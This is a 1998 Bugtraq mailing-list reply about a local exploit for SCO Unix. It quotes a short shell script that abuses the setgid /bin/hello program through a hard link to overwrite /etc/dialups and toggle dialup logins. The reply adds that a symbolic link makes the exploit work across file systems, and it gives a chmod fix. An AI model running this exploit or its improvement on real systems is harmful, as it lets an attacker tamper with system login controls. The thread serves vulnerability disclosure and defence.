[7934] in bugtraq
Re: Fw: Exploit for SCO.
daemon@ATHENA.MIT.EDU (John W. Temples)
Fri Sep 11 19:35:38 1998
Date: Fri, 11 Sep 1998 16:20:48 -0700
Reply-To: john@whitefang.com
From: "John W. Temples" <john@KUWAIT.NET>
X-To: Leshka <leshka@LESHKA.CHUVASHIA.SU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <003e01bddce2$881d8ec0$ded43ac2@IPIGN>
On Thu, 10 Sep 1998, Leshka wrote:
> tty=`tty`;ttyfile=`pwd`/`basename $tty`
> echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to disable"
> echo "login or just type <CTRL>-D to login enable. Sorry for the manual work."
> ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile
The exploit fails if your CWD is not in the same file system as /etc.
Using a symbolic rather than a hard link fixes that.
The exploit can be defeated with:
# chmod g-s /bin/hello
--
John W. Temples, III || Providing the first public access Internet
Gulfnet Kuwait || site in the Arabian Gulf region